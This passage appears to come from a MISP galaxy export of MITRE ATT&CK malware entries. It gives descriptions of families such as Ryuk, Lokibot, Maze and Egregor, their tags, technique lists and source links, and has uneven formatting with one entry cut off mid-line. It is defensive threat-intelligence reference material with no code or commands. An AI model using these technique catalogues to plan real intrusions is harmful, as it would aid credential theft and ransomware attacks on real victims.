- uses: *misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"


- uses: *misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"


- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"


Table 4844. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0544">https://attack.mitre.org/software/S0544</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/">https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/</a></td>
</tr>
</tbody>
</table>

Cadelspy - S0454

[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087). *(Citation: Symantec Chafer Dec 2015)*

The tag is: misp-galaxy:mitre-malware="Cadelspy - S0454"

Cadelspy - S0454 is also known as:

• Cadelspy

Cadelspy - S0454 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0454">https://attack.mitre.org/software/S0454</a></td>
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<td><a href="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets">https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</a></td>
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</table>

**SYSCON - S0464**

[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers. (Citation: Unit 42 CARROTBAT November 2018) (Citation: Unit 42 CARROTBAT January 2020)

The tag is: *misp-galaxy:mitre-malware="SYSCON - S0464"*

SYSCON - S0464 is also known as:

• SYSCON

SYSCON - S0464 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0464">https://attack.mitre.org/software/S0464</a></td>
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</table>
Ryuk - S0446

[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)

The tag is: *misp-galaxy:mitre-malware="Ryuk - S0446"

Ryuk - S0446 is also known as:

- Ryuk

Ryuk - S0446 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Native API - T1106"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Service Stop - T1489"* with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 4847. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0446">https://attack.mitre.org/software/S0446</a></td>
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</table>

**Lokibot - S0447**

[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)

The tag is: misp-galaxy:mitre-malware="Lokibot - S0447"

Lokibot - S0447 is also known as:

- Lokibot

Lokibot - S0447 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence%E2%80%9422">https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—22</a></td>
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<td><a href="https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode">https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode</a></td>
</tr>
</tbody>
</table>

**Carberp - S0484**

[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor. (Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)

The tag is: misp-galaxy:mitre-malware="Carberp - S0484"

Carberp - S0484 is also known as:
• Carberp

Carberp - S0484 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-
Maze - S0449

[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)

The tag is: `misp-galaxy:mitre-malware="Maze - S0449"`

Maze - S0449 is also known as:

- Maze

Maze - S0449 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 4850. Table References
Zen - S0494

[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013. (Citation: Google Security Zen)

The tag is: `misp-galaxy:mitre-malware="Zen - S0494"`

Zen - S0494 is also known as:

- Zen

Zen - S0494 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Injection - T1516"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0494">https://attack.mitre.org/software/S0494</a></td>
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TERRACOTTA - S0545

[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)

The tag is: `misp-galaxy:mitre-malware="TERRACOTTA - S0545"`

TERRACOTTA - S0545 is also known as:

- TERRACOTTA

TERRACOTTA - S0545 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Injection - T1516"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="SMS Control - T1582"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
Egregor - S0554

[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)

The tag is: `misp-galaxy:mitre-malware="Egregor - S0554"`

Egregor - S0554 is also known as:

- Egregor

Egregor - S0554 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary">https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary</a></td>
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<td><a href="https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/">https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/</a></td>
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<td><a href="https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/">https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/</a></td>
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**Metamorfo - S0455**

[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian
cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly Brazilian users. (Citation: Medium Metamorfo Apr 2020)

The tag is: misp-galaxy:mitre-malware="Metamorfo - S0455"

Metamorfo - S0455 is also known as:

- Metamorfo

Metamorfo - S0455 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
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<td><a href="https://attack.mitre.org/software/S0455">https://attack.mitre.org/software/S0455</a></td>
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**BlackMould - S0564**

[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers. (Citation: Microsoft GALLIUM December 2019)

The tag is: *misp-galaxy:mitre-malware*"BlackMould - S0564"

**BlackMould - S0564** is also known as:

- BlackMould

**BlackMould - S0564** has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern*"Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*"Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*"File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
SharpStage - S0546

[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities. (Citation: Cybereason Molerats Dec 2020) (Citation: BleepingComputer Molerats Dec 2020)

The tag is: `misp-galaxy:mitre-malware="SharpStage - S0546"`

SharpStage - S0546 is also known as:

- SharpStage

SharpStage - S0546 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"

BendyBear - S0574

[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)

The tag is: `misp-galaxy:mitre-malware="BendyBear - S0574"`

BendyBear - S0574 is also known as:

- BendyBear

BendyBear - S0574 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"

BackConfig - S0475

[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: Unit 42 BackConfig May 2020)

The tag is: `misp-galaxy:mitre-malware="BackConfig - S0475"`

BackConfig - S0475 is also known as:

- BackConfig

BackConfig - S0475 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with `estimative-language:likelihood-probability="almost-certain"`
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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**DropBook - S0547**

[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)

The tag is: *misp-galaxy:mitre-malware="DropBook - S0547"*

DropBook - S0547 is also known as:

• DropBook

DropBook - S0547 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
Netwalker - S0457

[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory. (Citation: TrendMicro Netwalker May 2020)

The tag is: `misp-galaxy:mitre-malware="Netwalker - S0457"`

Netwalker - S0457 is also known as:

- Netwalker

Netwalker - S0457 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"

